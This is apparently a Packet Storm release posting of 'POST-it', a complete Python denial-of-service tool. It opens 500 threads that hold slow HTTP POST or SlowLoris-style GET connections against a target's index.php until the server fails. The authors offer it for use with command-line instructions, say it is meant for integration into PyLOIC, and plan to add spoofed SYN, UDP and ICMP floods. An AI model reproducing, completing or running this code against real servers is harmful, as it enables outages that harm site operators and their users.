POST-it is a both proof of concept and fully functioning code, showing how the timeout-weaknesses in HTTP POST protocol can be leveraged to cause Apache servers to fail. Written in Python.
ef752b1371add83dc7f2c8c6decea19d-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
POST-it is a both proof of concept and fully functioning code,
showing how the timeout-weaknesses in HTTP POST protocol can be
leveraged to cause Apache (and perhaps IIS, have not tested yet)
servers to fail. This code uses the index.php page as the target,
but future revisions will be more modular.
It also incorporates a HTTP GET attack ala SlowLoris in the code.
Written in python, usage is 'python postit.py -t <post/get> <target
URL>
Source code below.
SOURCE
# PostIT HTTP POST/GET flooding tool, v1.1.0
# Opens many HTTP:POST/GET connections with long TimeOut to cause
servers to literaly crap out and die
# Idea is to allow for both POST and GET flood types
# Useage is : sudo python postit.py -t <POST/GET> <targetIP>
# hits apache servers with a index.php page hard
# next version will allow for selection of target page
# also perhaps a GUI would be fine...
# FOR INTEGRATION INTO PyLOIC
# GET/SlowLoris attack seems to work awesomely
# Written by Zodiac and Hex
import sys
import socket
import time
import getopt
import re
from threading import Thread
class MyThread(Thread,):
def __init__(self,SITE, DOS_TYPE):
Thread.__init__(self)
self.method = DOS_TYPE
self.site = SITE
self.kill_received = False
def run(self):
while not self.kill_received:
server = socket.gethostbyname(self.site)
post = 'x' * 6000
file = 'index.php'
request = '%s /%s HTTP/1.1\r\n' %
(self.method.upper(),file)
request += 'Host: %s\r\n' % (self.site)
request += 'User-Agent: Mozilla/5.0 (Windows; U;
Windows NT 6.1; en-US; rv:1.9.2.12) Gecko/20101026
Firefox/3.6.12\r\n'
request += 'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
request += 'Accept-Language: en-us,en;q=0.5\r\n'
request += 'Accept-Encoding: gzip,deflate\r\n'
request += 'Accept-Charset: ISO-8859-1,utf-
8;q=0.7,*;q=0.7\r\n'
request += 'Keep-Alive: 900\r\n'
request += 'Connection: keep-alive\r\n'
request += 'Content-Type: application/x-www-form-
urlencoded\r\n'
request += 'Content-length: %s\r\n\r\n' % (len(post))
newrequest = '%s\r\n' % (post)
newrequest += '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((server, 80))
s.send(request)
for c in newrequest:
sys.stdout.write( s.send(c).__str__() )
time.sleep(60)
s.close()
#s.recv(50000)
except:
print "Is It Dead Yet?"
def da_delegator(SITE,DOS_TYPE):
thread_count = 500
print '=' * 60
print 'POST-it v1.1.0'.center(60,'-')
print '=' * 60
threads = []
for num in range(thread_count):
thr1=MyThread(SITE,DOS_TYPE)
print 'start - %s' % thr1
thr1.start()
threads.append(thr1)
#thr1.join()
while len(threads) > 0:
try:
# Join all threads using a timeout so it doesn't
block
# Filter out threads which have been joined or are
None
threads = [t.join(1) for t in threads if t is not
None and t.isAlive()]
except KeyboardInterrupt:
print "Ctrl-c received! Sending kill to threads...
Just Kill The Terminal" # Need to fix this!!!
for t in threads:
t.kill_received = True
sys.exit(2)
def main(argv):
def usage():
print '=' * 60
print 'POST-it v1.1.0'.center(60,'-')
print '=' * 60
print 'For get DOS - USAGE: postit.py -t get
http://example.com'
print 'For post DOS - USAGE: postit.py -t post
http://example.com'
sys.exit(2)
if not argv:
usage()
try:
opts, args = getopt.getopt(sys.argv[1:], "t:h", ["help",
"type"])
except getopt.GetoptError, err:
print str(err)
sys.exit(2)
output = None
verbose = False
SITE = re.sub(r'http://', '', str(sys.argv[-1:][0]))
for o, a in opts:
if o == "-v":
verbose = True
elif o in ("-t", "--type"):
if a.lower() == 'post':
DOS_TYPE = 'POST'
da_delegator(SITE,DOS_TYPE)
elif a.lower() =='get':
DOS_TYPE = 'get'
da_delegator(SITE,DOS_TYPE)
elif o in ("-h", "--help"):
usage()
sys.exit()
else:
assert False, "unhandled option"
if __name__=="__main__":
main(sys.argv[1:])
# Needs to get a TKinter GUI frontend and allow for incorporation
of a SYN flood with spoofed source IP, TCP flood, basic ICMP flood,
basic HTTP flood and UDP flood to create a REALLY fucking
comprehensive DoS tool
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0
wpwEAQMCAAYFAk1H500ACgkQVJ6XHiA/y9PZFAQAgaxGd4r54rlQ8YaWmvRRYuRslgeb
wvx09i0zjwPNFWdwDU/a+/iccFofj2WH79ooEb0E8cbbAJqFL420hx/LyqbNbEWoarql
ysUNRkEuD2a0TDSnM2py7jvgEg6Z7BZ3OZqSACged+jILr0SqNklfnetnV5uHclfeTQb
P4BAN/Q=
=p6rn
-----END PGP SIGNATURE-----
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!